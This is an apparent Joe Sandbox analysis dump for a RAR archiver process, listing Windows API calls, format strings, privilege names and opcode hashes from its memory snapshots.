                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction ID: 8362ee61848afcddea421b5bef30ff39ebc8fe005383f9887f2410a960719b05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF0A422909A8249FB24AF64E4443F4A690DB50B7CFDD5330D63D050D9DE68D9A2DB70
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A94
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A6CB0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                              • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                              • API String ID: 668332963-4283793440
                                                                                                                                                                                                                              • Opcode ID: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
                                                                                                                                                                                                                              • Instruction ID: d2c3d78316e052c791e01356753c636f2de6d625a61388c298a5475c7aa1c781
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5228D22A096C285EB20FF24D8500F9A7E1FF55364FD44036D68D076AEDE2CE665E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF7CF89D4A6
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF7CF89D4B9
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF73
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF84
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF89EFA7
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF89EFCA
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: GetLastError.KERNEL32 ref: 00007FF7CF89EFD4
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: CloseHandle.KERNEL32 ref: 00007FF7CF89EFE7
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32 ref: 00007FF7CF89D4C6
                                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF7CF89D64A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF7CF89D68B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF7CF89D69A
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF7CF89D6AD
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32 ref: 00007FF7CF89D6FA
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 00007FF7CF89D705
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A2310: FlushFileBuffers.KERNEL32 ref: 00007FF7CF8A233E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A2310: SetFileTime.KERNEL32 ref: 00007FF7CF8A23DB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1930: CloseHandle.KERNELBASE ref: 00007FF7CF8A1958
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A39E0: SetFileAttributesW.KERNEL32(?,00007FF7CF8A34EE,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A3A0F
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A39E0: SetFileAttributesW.KERNEL32(?,00007FF7CF8A34EE,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A3A3C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                              • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                              • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                              • Instruction ID: f35e0482fc5da76fe27686fd455208adfa79e784bca208e16a157d4a020efb06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DD1C326A086C696EB20EF20D8402F9B7E0FB507A5F804131DA9D476D9DF3CE616E734
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAEE9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF01
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF19
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF75
                                                                                                                                                                                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAFB0
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB23B
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB244
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB287
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                              • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                              • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                              • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                              • Instruction ID: 87feaeb2af158e632c1733b6fcb0d7e3df52314f32c4774b5280ee76fa8796e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9C18D32B09B8289EB14EF21E8502E9A7E0FF44BA4F845031DA4E07799DF3CD565D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                              • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                              • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction ID: 05bfa62328a9ba836f2b316112500c07bc1ef8fa18c3398a7cf5ad3973908e81
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4221A131A18A8286FB94AF20E8557FAA3E1EF94B24FE05035D94E06558CF3DD4699730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E298
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E2AB
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E2F7
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF73
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF84
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF89EFA7
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF89EFCA
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: GetLastError.KERNEL32 ref: 00007FF7CF89EFD4
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF89EF50: CloseHandle.KERNEL32 ref: 00007FF7CF89EFE7
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF7CF89E357
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E362
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID: SeBackupPrivilege
                                                                                                                                                                                                                              • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                              • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                              • Instruction ID: d6a6ea063195f3efe82ed8c85a35d9a3e36cfbea13017bec923567313d954ce9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9261A232A086C28AEB14AF11E4442E9A7E0FB447A4FC04235EB6D56AD5CF3CE665D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleepswprintf
                                                                                                                                                                                                                              • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                              • API String ID: 407366315-3491873314
                                                                                                                                                                                                                              • Opcode ID: 1b5797f556ef394b6043de74452f8bcb217fbde07e8979e5d0f987130f30b9ef
                                                                                                                                                                                                                              • Instruction ID: 2c2e3a26e235372664a9d00b1044b6c544e69f347a3254c02dff2f6cbc7364c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b5797f556ef394b6043de74452f8bcb217fbde07e8979e5d0f987130f30b9ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D02E232A086C286EB20EF25D8446EDA3E5FB88BA4F810135DE5D4779ADE3CE455D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF7CF884BD8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1E80: CreateFileW.KERNELBASE ref: 00007FF7CF8A1F4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1E80: GetLastError.KERNEL32 ref: 00007FF7CF8A1F59
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1E80: CreateFileW.KERNELBASE ref: 00007FF7CF8A1F99
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1E80: GetLastError.KERNEL32 ref: 00007FF7CF8A1FA2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A1E80: SetFileTime.KERNEL32 ref: 00007FF7CF8A1FF1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                              • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                              • API String ID: 2965465231-221484280
                                                                                                                                                                                                                              • Opcode ID: bc1c7553d5c44cd859e352ff8c1349b34ba544aa6d31214373a77d6043f05ddf
                                                                                                                                                                                                                              • Instruction ID: 2918bda4c99430a92399e168f6d8db8127033cd2fee6bf49bea29998c4ca2deb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1c7553d5c44cd859e352ff8c1349b34ba544aa6d31214373a77d6043f05ddf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53F18A22B09AC286EA60EF12D4402EDA7E1FB45BA4FC44436DA4E47786DF3CE565D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction ID: 5beb902a8fb87808a4877dc84cab44f1426352b4ffe176eb6771803d092a1640
